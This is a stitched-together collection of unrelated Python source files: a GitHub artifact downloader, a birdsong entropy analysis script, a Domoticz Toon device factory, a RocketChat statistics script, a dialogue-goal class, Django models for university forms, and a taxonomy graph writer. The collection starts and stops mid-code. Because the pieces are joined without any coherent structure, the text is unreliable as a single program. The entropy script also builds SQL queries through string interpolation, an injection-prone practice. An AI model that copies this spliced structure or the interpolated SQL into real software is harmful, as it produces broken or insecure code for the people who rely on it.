% days) # but still add the last set since we have them results += artifacts break results += artifacts # We are on the last page if response["total_count"] < 100: break page += 1 return results def older_than(artifact, days=2): """ Determine if an artifact is older than days, return True/False """ start_date = today - timedelta(days=days) created_at = artifact["created_at"] created_timestamp = datetime.strptime(created_at, "%Y-%m-%dT%H:%M:%SZ") diff = created_timestamp - start_date # If the difference in days is negative, it was created before the start date if diff.days < 0: return True return False def recursive_find(base, pattern="*"): for root, _, filenames in os.walk(base): for filename in fnmatch.filter(filenames, pattern): yield os.path.join(root, filename) def read_json(filename): with open(filename, "r") as fd: content = json.loads(fd.read()) return content def download_artifacts(artifacts, output, days): """ Extract artifacts to an output directory """ if not os.path.exists(output): os.makedirs(output) for artifact in artifacts: if artifact["expired"]: print( "Artifact %s from %s is expired." % (artifact["name"], artifact["created_at"]) ) continue # Is it within our number of days to check (a few might sneak through) if days: if older_than(artifact, days): print( "Artifact %s was created %s, more than %s days ago." % (artifact["name"], artifact["created_at"], days) ) continue response = requests.get(artifact["archive_download_url"], headers=HEADERS) if response.status_code != 200: abort_if_fail(response, "Unable to download artifact %s" % artifact["name"]) # Grab the created at date created_at = artifact["created_at"] # Create a temporary directory tmp = tempfile.mkdtemp() zipfile = ZipFile(BytesIO(response.content)) zipfile.extractall(tmp) # Loop through files, add those that aren't present for filename in recursive_find(tmp): try: data = read_json(filename) except: print("%s is not valid json, cannot parse." % filename) continue # We can load any valid result (does not need to have predictions) try: jsonschema.validate(data, schema=spliced_result_schema) except: print("%s is not valid for the current result schema." % filename) continue relpath = filename.replace(tmp, "").strip(os.sep) # replace version @ with - filepath = filename.replace("@", "-") # Remove package prefix filepath = filepath.replace("pkg-", "", 1) # We don't need the directory - can get metadata from the basename filepath = os.path.basename(filepath) # Add main package at top level pkg = filepath.split("-")[0] # Get the experiment also experiment = ( filepath.split("experiment")[-1].replace("splices.json", "").strip("-") ) # Just maintain the entire directory structure to read for the folder filepath = filepath.replace("-splices.json", "") # Let's split the package name and version as part of the path finalpath = os.path.join(output, experiment, pkg, filepath, "splices.json") # If the file doesn't have size, don't add size = get_size(filename) if size == 0: print("Result file %s has size 0, skipping." % relpath) continue # If it doesn't exist, add right away! if not os.path.exists(finalpath): print("Found new result file: %s" % relpath) save_artifact(filename, finalpath) # Otherwise compare by hash (and date?) 
else: created_at_ts = datetime.strptime( created_at, "%Y-%m-%dT%H:%M:%SZ" ).timestamp() old_created_at = os.stat(finalpath).st_ctime # If the recent is newer, copy over if created_at_ts > old_created_at: save_artifact(filename, finalpath) # Cleanup the temporary directory shutil.rmtree(tmp) def save_artifact(source, destination): """ Save an artifact. """ destdir = os.path.dirname(destination) if not os.path.exists(destdir): os.makedirs(destdir) if os.path.exists(destination): os.remove(destination) shutil.copyfile(source, destination) def main(): """main primarily parses environment variables to prepare for creation""" # Github repository to check repository = os.environ.get("INPUT_REPOSITORY") or os.environ.get( "GITHUB_REPOSITORY" ) output = os.environ.get("INPUT_OUTDIR", os.path.join(here, "artifacts")) # Number of days to go back (stick to max otherwise cannot run) days = int(os.environ.get("INPUT_DAYS", 2)) # Retrieve artifacts artifacts = get_artifacts(repository, days) # Download artifacts to output directory download_artifacts(artifacts, output, days) if __name__ == "__main__": main() <gh_stars>10-100 """ Setup engine application entry """ from nspawn.app.engine.main import SetupMain if __name__ == "__main__": SetupMain().perform() <reponame>JaerongA/lman-deafening """ Calculate entropy, entropy variance per syllable Stores the results in individual_syllable, syllable table """ def get_entropy(query, cmap='hot_r', entropy_color='k', update=False, save_fig=None, view_folder=False, update_db=False, fig_ext='.png'): from pyfinch.analysis import note_buffer, freq_range, nb_note_crit from pyfinch.analysis import AudioInfo, SongInfo from pyfinch.database.load import create_db, DBInfo, ProjectLoader from pyfinch.utils import save from pyfinch.utils.draw import remove_right_top import matplotlib.colors as colors import matplotlib.gridspec as gridspec import matplotlib.pyplot as plt import pandas as pd # Create & Load database if update_db: # Assumes that song, ff database have been created create_db('create_individual_syllable.sql') # All song syllables create_db('create_syllable.sql') # Song syllables averaged per session # Make save path if save_fig: save_path = save.make_dir(ProjectLoader().path / 'Analysis', save_folder_name, add_date=False) # Load database db = ProjectLoader().load_db() # SQL statement db.execute(query) # Loop through db for row in db.cur.fetchall(): # Load song info from db song_db = DBInfo(row) name, path = song_db.load_song_db() song_note = song_db.songNote si = SongInfo(path, name, update=update) # song object df = pd.DataFrame() # Store results here note_ind1 = -1 # note index across the session for file in si.files: file = ProjectLoader().path / file # print(f'Loading... 
{file}') # Loop through the notes note_ind2 = -1 # note index within a file # Load audio object with info from .not.mat files ai = AudioInfo(file) ai.load_notmat() for note, onset, offset in zip(ai.syllables, ai.onsets, ai.offsets): if note not in song_db.songNote: continue # skip if not a song note if update_db and note in song_note: # Fill in song info query = f"INSERT OR IGNORE INTO syllable (songID, birdID, taskName, note)" \ f"VALUES({song_db.id}, '{song_db.birdID}', '{song_db.taskName}', '{note}')" db.cur.execute(query) db.conn.commit() song_note = song_note.replace(note, '') # Note start and end note_ind1 += 1 # note index across the session note_ind2 += 1 # note index within a file # if note_ind1 != 44: # continue duration = offset - onset # Get spectrogram timestamp, data = ai.extract([onset, offset]) # Extract data within the range spect_time, spect, spect_freq = ai.spectrogram(timestamp, data) spectral_entropy = ai.get_spectral_entropy(spect, mode='spectral') se_dict = ai.get_spectral_entropy(spect, mode='spectro_temporal') if update_db and note in song_db.songNote: query = f"INSERT OR IGNORE INTO individual_syllable (noteIndSession, noteIndFile, songID, fileID, birdID, taskName, note, context)" \ f"VALUES({note_ind1}, {note_ind2}, {song_db.id}, '{file.stem}', '{song_db.birdID}', '{song_db.taskName}', '{note}', '{ai.context}')" db.cur.execute(query) db.conn.commit() query = f"UPDATE individual_syllable " \ f"SET entropy={round(spectral_entropy, 3)}, spectroTemporalEntropy={round(se_dict['mean'], 3)}, entropyVar={round(se_dict['var'], 4)} " \ f"WHERE noteIndSession={note_ind1} AND noteIndFile={note_ind2} AND songID={song_db.id}" db.cur.execute(query) # Organize results per song session temp_df = pd.DataFrame({'note': [note], 'context': [ai.context], 'spectral_entropy': [round(spectral_entropy, 3)], 'spectro_temporal_entropy': [round(se_dict['mean'], 3)], 'entropy_var': [round(se_dict['var'], 4)] }) df = df.append(temp_df, ignore_index=True) if save_fig: # Parameters txt_offset = 0.2 font_size = 6 # Plot figure fig = plt.figure(figsize=(4, 2), dpi=250) fig_name = f"{note_ind1 :03} - {file.name}, note#{note_ind2} - {note}" plt.suptitle(fig_name, y=.90, fontsize=font_size) gs = gridspec.GridSpec(4, 6) # Plot spectrogram ax_spect = plt.subplot(gs[1:3, 0:3]) spect_time = spect_time - spect_time[0] # starts from zero ax_spect.pcolormesh(spect_time, spect_freq, spect, # data cmap=cmap, shading='auto', norm=colors.SymLogNorm(linthresh=0.05, linscale=0.03, vmin=0.5, vmax=100, )) remove_right_top(ax_spect) ax_spect.set_xlim(-note_buffer, duration + note_buffer) ax_spect.set_ylim(freq_range[0], freq_range[1]) ax_spect.set_xlabel('Time (ms)', fontsize=font_size) ax_spect.set_ylabel('Frequency (Hz)', fontsize=font_size) plt.yticks(freq_range, list(map(str, freq_range)), fontsize=5) plt.xticks(fontsize=5), plt.yticks(fontsize=5) # Calculate spectral entropy per time bin # Plot syllable entropy ax_se = ax_spect.twinx() ax_se.plot(spect_time, se_dict['array'], entropy_color) ax_se.set_ylim(0, 1) ax_se.spines['top'].set_visible(False) ax_se.set_ylabel('Entropy', fontsize=font_size) plt.xticks(fontsize=5), plt.yticks(fontsize=5) # Print out text results txt_xloc = -1.5 txt_yloc = 0.8 ax_txt = plt.subplot(gs[1:, -1]) ax_txt.set_axis_off() # remove all axes ax_txt.text(txt_xloc, txt_yloc, f"Spectral Entropy = {round(spectral_entropy, 3)}", fontsize=font_size) txt_yloc -= txt_offset ax_txt.text(txt_xloc, txt_yloc, f"Spectrotemporal Entropy = {round(se_dict['mean'], 3)}", fontsize=font_size) txt_yloc 
-= txt_offset ax_txt.text(txt_xloc, txt_yloc, f"Entropy Variance = {round(se_dict['var'], 4)}", fontsize=font_size) # Save results save_path2 = save.make_dir(save_path, si.name, add_date=False) save.save_fig(fig, save_path2, fig_name, view_folder=view_folder, fig_ext=fig_ext) # Save results to ff_results db if not df.empty: if update_db: for note in df['note'].unique(): for context in df['context'].unique(): temp_df = df[(df['note'] == note) & (df['context'] == context)] if context == 'U': db.cur.execute( f"UPDATE syllable SET nbNoteUndir={len(temp_df)} WHERE songID= {song_db.id} AND note= '{note}'") if len(temp_df) >= nb_note_crit: db.cur.execute( f"UPDATE syllable SET entropyUndir={temp_df['spectral_entropy'].mean() : .3f} WHERE songID= {song_db.id} AND note= '{note}'") db.cur.execute( f"UPDATE syllable SET spectroTemporalEntropyUndir={temp_df['spectro_temporal_entropy'].mean(): .3f} WHERE songID= {song_db.id} AND note= '{note}'") db.cur.execute( f"UPDATE syllable SET entropyVarUndir={temp_df['entropy_var'].mean(): .4f} WHERE songID= {song_db.id} AND note= '{note}'") elif context == 'D': db.cur.execute( f"UPDATE syllable SET nbNoteDir={len(temp_df)} WHERE songID= {song_db.id} AND note= '{note}'") if len(temp_df) >= nb_note_crit: db.cur.execute( f"UPDATE syllable SET entropyDir={temp_df['spectral_entropy'].mean() : .3f} WHERE songID= {song_db.id} AND note= '{note}'") db.cur.execute( f"UPDATE syllable SET spectroTemporalEntropyDir={temp_df['spectro_temporal_entropy'].mean() : .3f} WHERE songID= {song_db.id} AND note= '{note}'") db.cur.execute( f"UPDATE syllable SET entropyVarDir={temp_df['entropy_var'].mean() : .4f} WHERE songID= {song_db.id} AND note= '{note}'") db.conn.commit() # If neither condition meets the number of notes criteria db.cur.execute( f"SELECT nbNoteUndir, nbNoteDir FROM syllable WHERE songID={song_db.id} AND note= '{note}'") nb_notes = [{'U': data[0], 'D': data[1]} for data in db.cur.fetchall()][0] if not (bool(nb_notes['U']) or bool(nb_notes['D'])): db.cur.execute(f"DELETE FROM syllable WHERE songID= {song_db.id} AND note= '{note}'") db.conn.commit() # Save df to csv if "save_path2" in locals(): df = df.rename_axis(index='index') df.to_csv(save_path2 / ('-'.join(save_path2.stem.split('-')[1:]) + '.csv'), index=True, header=True) if update_db: db.to_csv('syllable') db.to_csv('individual_syllable') print('Done!') if __name__ == '__main__': # Parameter update = False # update or make a new cache file for a class object save_fig = True # save the result figure view_folder = True # view the folder where figures are stored update_db = False # save results to DB save_folder_name = 'Entropy' # figures saved to analysis/save_folder_name entropy_color = 'm' cmap = 'Greys' fig_ext = '.pdf' # .png or .pdf # SQL statement query = "SELECT * FROM song WHERE id=71" get_entropy(query, cmap=cmap, entropy_color=entropy_color, update=update, save_fig=save_fig, view_folder=view_folder, update_db=update_db, fig_ext=fig_ext ) <filename>devices/device_factory.py import Domoticz import toonapilib from devices.device_container import container from devices.gas import DeviceGas from devices.heating_active import DeviceHeatingActive from devices.hotwater_active import DeviceHotWaterActive from devices.modulation_level import DeviceModulationLevel from devices.power import DevicePower from devices.preheat_active import DevicePreHeatActive from devices.program_state import DeviceProgramState from devices.set_point import DeviceSetPoint from devices.temperature import DeviceTemperature from 
devices.thermostat_state import DeviceThermostatState from devices.smartplug import DeviceSmartPlugState from devices.smartplug import DeviceSmartPlugUsage from devices.smartplug import DeviceSmartPlugkWh from devices.lights import DeviceLightState class DeviceFactory: def __init__(self): return @staticmethod def create_devices(toon, plugin_devices): Domoticz.Log("Check and create Toon devices") """Adding standard devices""" container.add_device(DevicePower(plugin_devices, toon).create()) container.add_device(DeviceGas(plugin_devices, toon).create()) container.add_device(DeviceTemperature(plugin_devices, toon).create()) container.add_device(DeviceSetPoint(plugin_devices, toon).create()) container.add_device(DeviceHeatingActive(plugin_devices, toon).create()) container.add_device(DeviceHotWaterActive(plugin_devices, toon).create()) container.add_device(DevicePreHeatActive(plugin_devices, toon).create()) container.add_device(DeviceThermostatState(plugin_devices, toon).create()) container.add_device(DeviceProgramState(plugin_devices, toon).create()) container.add_device(DeviceModulationLevel(plugin_devices, toon).create()) # Smart Plugs for plug in toon.smartplugs: container.add_device(DeviceSmartPlugState(plugin_devices, toon, plug).create(plug)) container.add_device(DeviceSmartPlugUsage(plugin_devices, toon, plug).create(plug)) container.add_device(DeviceSmartPlugkWh(plugin_devices, toon, plug).create(plug)) # Lights for light in toon.lights: container.add_device(DeviceLightState(plugin_devices, toon, light).create(light)) return container <reponame>Lab-8916100448256/crazy-toads.github.io # coding: utf8 # toutes les chaines sont en unicode (même les docstrings) from __future__ import unicode_literals from pprint import pprint from rocketchat_API.rocketchat import RocketChat import json import dev_config as cfg import os import random from datetime import datetime from monthdelta import monthdelta from common.channelhelper import getTsunamy from common.channelhelper import Tsunami def getColor(): r = random.randrange(255) g = random.randrange(255) b = random.randrange(255) return 'rgb({:0},{:0},{:0})'.format(r,g,b) rocket = RocketChat(cfg.rocket['user'], cfg.rocket['password'], server_url='https://coa.crapaud-fou.org') index = 0 labels = [None] * 12 messagesByChannel = [] messagesByTsunamy = [] usersByChannel = [] messagesDataTsunamy = { "global": [0] * 12, "project": [0] * 12, "democraty": [0] * 12, "ecology": [0] * 12, "technology": [0] * 12, } now = datetime.now() date = datetime(now.year, now.month, now.day, 0,0,0) info = { "updated": "updated {:02}/{:02}/{:04}".format(now.day, now.month, now.year), "labels": labels, "messagesByChannel": messagesByChannel, "usersByChannel": usersByChannel, "messagesByTsunamy": [{ "label": "global", "backgroundColor": getColor(), "data": messagesDataTsunamy['global'] }, { "label": "projet", "backgroundColor": getColor(), "data": messagesDataTsunamy['project'] }, { "label": "democratie", "backgroundColor": getColor(), "data": messagesDataTsunamy['democraty'] }, { "label": "ecologie", "backgroundColor": getColor(), "data": messagesDataTsunamy['ecology'] }, { "label": "technologie", "backgroundColor": getColor(), "data": messagesDataTsunamy['technology'] }] } while True: channels = rocket.channels_list(offset=index).json() totalChannels = channels['total'] for channel in channels['channels']: dataMess = [] dataUsers = [] pprint( channel['name'] ) begin = date - monthdelta(12) end = begin + monthdelta(1) tsunamy = getTsunamy(channel) for id in range(0, 12): 
labels[id] = begin.strftime("%b %Y") begindate = begin.isoformat() enddate = end.isoformat() resultMess = rocket.channels_history(channel['_id'], oldest= begindate, latest=enddate, count= 10000).json() lenght = len(resultMess['messages']) dataMess.append(lenght) if lenght > 0: if tsunamy & Tsunami.GLOBAL: messagesDataTsunamy['global'][id] += lenght if tsunamy & Tsunami.PROJECT: messagesDataTsunamy['project'][id] += lenght if tsunamy & Tsunami.DEMOCRACY: messagesDataTsunamy['democraty'][id] += lenght if tsunamy & Tsunami.ECOLOGY: messagesDataTsunamy['ecology'][id] += lenght if tsunamy & Tsunami.TECHNOLOGY: messagesDataTsunamy['technology'][id] += lenght users = [] for mess in resultMess['messages']: users.append(mess['u']['_id']) usersDistinct = set(users) dataUsers.append(len(usersDistinct)) else: dataUsers.append(0) begin = end end = begin + monthdelta(1) color = getColor() messageByChannel = { "label": channel['name'], "backgroundColor": color, "data": dataMess } userByChannel = { "label": channel['name'], "backgroundColor": color, "data": dataUsers } messagesByChannel.append(messageByChannel) usersByChannel.append(userByChannel) if channels['count'] + channels['offset'] >= channels['total']: break index += channels['count'] # Récupération du répertoire racine du repo rootFolder = os.path.join(os.path.dirname(__file__), '..') # Répertoire pour stocker le fichier de sortie dataFolder = os.path.join(rootFolder, 'public', 'data') statsFilePath = os.path.abspath( os.path.join(dataFolder, 'channelsstat.json')) with open(statsFilePath, "w") as file_write: json.dump(info, file_write) from app import logger from goals import * from models import * class LoopActionGoal(ActionGoal): """Goal for adding a loop action""" def __init__(self, context, loop=None, condition=None, action=None): super().__init__(context) self.loop_actions = [] self.todos = [GetLoopActionsGoal(self.context, self.loop_actions)] self.setattr("action", action) self.setattr("condition", condition) self.setattr("loop", loop) def complete(self): assert hasattr(self, "actions") self.actions.append(LoopAction(self.loop, self.condition, self.loop_actions)) return super().complete() def advance(self): logger.debug(f"Advancing {self.__class__.__name__}...") self._message = None if self.todos: todo = self.todos.pop() todo.advance() if todo.error: if isinstance(todo, GetConditionGoal): self.error = todo.error else: self._message = todo.error return if todo.is_complete: todo.complete() else: self.todos.append(todo) def setattr(self, attr, value): if attr == "action" and value: setattr(value, "actions", self.loop_actions) if value.error: self.error = value.error elif value.is_complete: value.complete() else: self.todos[0].todos.append(value) return elif attr == "condition": if value is None: self.todos.append(GetConditionGoal(self.context, self)) elif isinstance(value, UntilStopCondition): self.loop = "until" self.condition = value elif value.variable.variable not in self.variables: self.error = f"Variable {value.variable.variable} used in the condition hasn't been created yet. Please try again or create the variable first." elif isinstance(value.value, ValueOf) and value.value.variable not in self.variables: self.error = f"Variable {value.value.variable} used in the condition hasn't been created yet. Please try again or create the variable first." 
elif isinstance(value, ComparisonCondition): if isinstance(value.value, str): if value.value in self.variables: value.value = ValueOf(value.value) self.condition = value else: self.error = f"The value {value.value} is not a number, so I cannot compare. Please try again." else: self.condition = value else: self.condition = value return elif attr == "loop": assert value is not None self.loop = value return setattr(self, attr, value) from django.db import models from django.utils import timezone class LibraryFine(models.Model): G_CHOICES = (('1','Male'),('2','Female')) user = models.ForeignKey('allauthdemo_auth.DemoUser',related_name='library_fines') date = models.DateTimeField(default=timezone.now) gender = models.CharField(max_length=1,choices = G_CHOICES,default=1) book_count = models.IntegerField(default=1) amount_fined = models.IntegerField(default=0) created_date = models.DateTimeField( default=timezone.now) published_date = models.DateTimeField( blank=True, null=True) def publish(self): self.published_date = timezone.now() self.save() # def __str__(self): # return self.title class ShahparanHall(models.Model): G_CHOICES = (('1','Male'),('2','Female')) user = models.ForeignKey('allauthdemo_auth.DemoUser',related_name='shahparan_hall_fine') date = models.DateTimeField(default=timezone.now) gender = models.CharField(max_length=1,choices = G_CHOICES,default=1) created_date = models.DateTimeField( default=timezone.now) published_date = models.DateTimeField( blank=True, null=True) father_name = models.CharField(max_length = 50,default="") mother_name = models.CharField(max_length = 50,default="") villagep = models.CharField(max_length = 50,default="") postp = models.CharField(max_length = 50,default="") thanap = models.CharField(max_length = 50,default="") zillp = models.CharField(max_length = 50,default="") villagec = models.CharField(max_length = 50,default="") postc = models.CharField(max_length = 50,default="") thanc = models.CharField(max_length = 50,default="") zillc = models.CharField(max_length = 50,default="") hons_first = models.CharField(max_length = 50,default="") firstst_cgpa = models.IntegerField(default=0) first_credit = models.IntegerField(default=0) second_cgpa = models.IntegerField(default=0) second_credit = models.IntegerField(default=0) third_cgpa = models.IntegerField(default=0) third_credit = models.IntegerField(default=0) fourth_cgpa = models.IntegerField(default=0) fourth_credit = models.IntegerField(default=0) bank_money = models.DecimalField(max_digits = 10, decimal_places=2,blank=True, null=True) bank_no = models.IntegerField(default=0) def publish(self): self.published_date = timezone.now() self.save() # def __str__(self): # return self.title class Transcript(models.Model): G_CHOICES = (('1','Male'),('2','Female')) user = models.ForeignKey('allauthdemo_auth.DemoUser',related_name='transcript') date = models.DateTimeField(default=timezone.now) gender = models.CharField(max_length=1,choices = G_CHOICES,default=1) created_date = models.DateTimeField( default=timezone.now) published_date = models.DateTimeField( blank=True, null=True) honors_reg = models.IntegerField(default=0) ms_reg = models.IntegerField(default=0) discipline = models.CharField(max_length = 100, default = "") exam_name_date = models.CharField(max_length = 100,default="") address = models.CharField(max_length = 200, default="") def publish(self): self.published_date = timezone.now() self.save() # def __str__(self): # return self.title class Gradesheet(models.Model): G_CHOICES = 
(('1','Male'),('2','Female')) user = models.ForeignKey('allauthdemo_auth.DemoUser',related_name='gradesheet') date = models.DateTimeField(default=timezone.now) gender = models.CharField(max_length=1,choices = G_CHOICES,default=1) created_date = models.DateTimeField( default=timezone.now) published_date = models.DateTimeField( blank=True, null=True) honors_reg = models.IntegerField(default=0) discipline = models.CharField(max_length = 100, default = "") school = models.CharField(max_length = 100, default = "") exam_name_date = models.CharField(max_length = 100,default="") cgpa = models.DecimalField(max_digits = 2, decimal_places=2,default=0) letter = models.CharField(max_length=2,default="") address = models.CharField(max_length = 200, default="") nationlaity = models.CharField(max_length = 30,default="Bangladeshi") def publish(self): self.published_date = timezone.now() self.save() # def __str__(self): # return self.title class CashMemo(models.Model): G_CHOICES = (('1','Male'),('2','Female')) user = models.ForeignKey('allauthdemo_auth.DemoUser',related_name='cash_memo') date = models.DateTimeField(default=timezone.now) #Memo Fields account_no = models.IntegerField(default=0) branch = models.CharField(max_length = 30,default="") name = models.CharField(max_length = 30,default="") money1 = models.DecimalField(max_digits = 10, decimal_places=2,blank=True, null=True) moeny2 = models.DecimalField(max_digits = 10, decimal_places=2,blank=True, null=True) money3 = models.DecimalField(max_digits = 10, decimal_places=2,blank=True, null=True) total = models.DecimalField(max_digits = 15, decimal_places=2,blank=True, null=True) created_date = models.DateTimeField( default=timezone.now) published_date = models.DateTimeField( blank=True, null=True) def publish(self): self.published_date = timezone.now() self.save() # def __str__(self): # return self.title class S2(models.Model): G_CHOICES = (('1','Male'),('2','Female')) user = models.ForeignKey('allauthdemo_auth.DemoUser',related_name='s_2') date = models.DateTimeField(default=timezone.now) gender = models.CharField(max_length=1,choices = G_CHOICES,default=1) #S2 Fields admission_fee = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) tution_fee = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) union_fee = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) reg_fee = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) welfare_fee = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) library_fee = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) computer_fee = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) rover_scout = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) bncc = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) travel = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) hall_seet = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) other = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) meical_fee = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) id_fee = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) book_fee = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) festival_fee = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) 
syllabus_fee = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) diary_fee = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) marksheet_fee = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) fine = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) extra1 = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) extra2 = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) extra3 = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) extra4 = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) extra5 = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) total = models.DecimalField(max_digits = 10, decimal_places=2,blank=True, null=True) created_date = models.DateTimeField( default=timezone.now) published_date = models.DateTimeField( blank=True, null=True) def publish(self): self.published_date = timezone.now() self.save() # def __str__(self): # return self.title class STD6(models.Model): G_CHOICES = (('1','Male'),('2','Female')) user = models.ForeignKey('allauthdemo_auth.DemoUser',related_name='std_6') date = models.DateTimeField(default=timezone.now) gender = models.CharField(max_length=1,choices = G_CHOICES,default=1) #STD-6 Fields total_theory = models.IntegerField( blank=True,null=True) total_lab = models.IntegerField(blank=True,null=True) exam_theory = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) exam_lab = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) drop_theory = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) drop_lab = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) certiricate = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) duplicate = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) registration_late = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) non_colligiate = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) course_modificatoin = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) other = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) extra1 = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) extra2 = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) extra3 = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) extra4 = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) extra5 = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) total = models.DecimalField(max_digits = 10, decimal_places=2,blank=True, null=True) created_date = models.DateTimeField( default=timezone.now) published_date = models.DateTimeField( blank=True, null=True) def publish(self): self.published_date = timezone.now() self.save() # def __str__(self): # return self.title#!/usr/bin/env python from __future__ import print_function # batteries import os import sys import gzip import bz2 import argparse import logging import csv import urllib.request import codecs from collections import OrderedDict class Graph(object): def __init__(self, graph_dict=None): """ initializes a graph object If no dictionary or None is given, an empty dictionary will be used """ self.__ranks = {'d__' : 
'superkingdom', 'p__' : 'phylum', 'c__' : 'class', 'o__' : 'order', 'f__' : 'family', 'g__' : 'genus', 's__' : 'species'} if graph_dict == None: graph_dict = {} self.__graph_dict = graph_dict self.__graph_nodeIDs = {} self.__seen = {} def vertices(self): """ returns the vertices of a graph """ return list(self.__graph_dict.keys()) def edges(self): """ returns the edges of a graph """ return self.__generate_edges() def add_vertex(self, vertex): """ If the vertex "vertex" is not in self.__graph_dict, a key "vertex" with an empty list as a value is added to the dictionary. Otherwise nothing has to be done. """ if vertex not in self.__graph_dict: self.__graph_dict[vertex] = [] self.__graph_nodeIDs[vertex] = len(self.__graph_nodeIDs.keys())+1 def add_edge(self, vertex1, vertex2): """ assumes that edge is of type set, tuple or list; between two vertices can be multiple edges! """ try: self.__graph_dict[vertex1].append(vertex2) except KeyError: self.__graph_dict[vertex1] = [vertex2] def __generate_edges(self): """ A static method generating the edges of the graph "graph". Edges are represented as sets with one (a loop back to the vertex) or two vertices """ edges = [] for vertex in self.__graph_dict: for neighbour in self.__graph_dict[vertex]: if {neighbour, vertex} not in edges: edges.append({vertex, neighbour}) return edges def __str__(self): res = "vertices: " for k in self.__graph_dict.keys(): res += str(k) + " " res += "\nvertex UIDs: " for k in self.__graph_dict: res += str(self.__graph_nodeIDs[k]) + " " res += "\nedges: " for edge in self.__generate_edges(): res += str(edge) + " " return res def get_rank(self, vertex): """ Getting rank based on GTDB prefixes """ return self.__ranks.get(vertex[0:3], 'subspecies') def iter_graph(self, vertex): """ General iteration of all nodes in the graph """ if vertex == 'root': self.__seen = {} for child in self.__graph_dict[vertex]: if child not in self.__seen: print('Parent: {}; Child: {}'.format(vertex, child)) self.iter_graph(child) self.__seen[child] = 1 def _write_dmp_iter(self, vertex, names, nodes, embl_code='XX'): for child in self.__graph_dict[vertex]: if child in self.__seen: continue self.__seen[child] = 1 # names names.append([str(self.__graph_nodeIDs[child]), child, '', 'scientific name']) # nodes rank = self.get_rank(child) nodes.append([self.__graph_nodeIDs[child], self.__graph_nodeIDs[vertex], rank, embl_code, 0, 0, 11, 1, 1, 0, 0, 0]) # children self._write_dmp_iter(child, names, nodes, embl_code) def write_dmp(self, outdir='.', embl_code='XX'): """ Writing names.dmp & nodes.dmp """ names_file = os.path.join(outdir, 'names.dmp') nodes_file = os.path.join(outdir, 'nodes.dmp') # iterating over all vertices starting at the root ## writing root ### names names = [[str(self.__graph_nodeIDs['root']), 'all', '', 'synonym']] names.append([str(self.__graph_nodeIDs['root']), 'root', '', 'scientific name']) ### nodes nodes = [[self.__graph_nodeIDs['root'], 1, 'no rank', embl_code, 0, 0, 11, 1, 1, 0, 0, 0]] ## Child names & nodes self._write_dmp_iter('root', names, nodes, embl_code) # Sorting by taxID & writing ## names with open(names_file, 'w') as outName: for x in sorted(names, key = lambda x: int(x[0])): outName.write('\t|\t'.join(x) + '\t|\n') ## nodes with open(nodes_file, 'w') as outNode: for x in sorted(nodes, key = lambda x: x[0]): outNode.write('\t|\t'.join([str(xx) for xx in x]) + '\t|\n') return names_file, nodes_file def _to_tbl_iter(self, vertex): for child in self.__graph_dict[vertex]: if child in self.__seen: continue 
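# --- Illustrative usage sketch for the Graph class above (not from the source). ---
# The GTDB-style lineage string and the output directory are assumptions made for
# this example; it is meant to be run once the full class definition is available.
g = Graph()
g.add_vertex('root')
parent = 'root'
lineage = ('d__Bacteria;p__Proteobacteria;c__Gammaproteobacteria;'
           'o__Enterobacterales;f__Enterobacteriaceae;g__Escherichia;'
           's__Escherichia coli')
for taxon in lineage.split(';'):
    g.add_vertex(taxon)
    g.add_edge(parent, taxon)
    parent = taxon
names_dmp, nodes_dmp = g.write_dmp(outdir='.')   # writes names.dmp and nodes.dmp
print('rank of leaf:', g.get_rank('s__Escherichia coli'))   # 'species'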
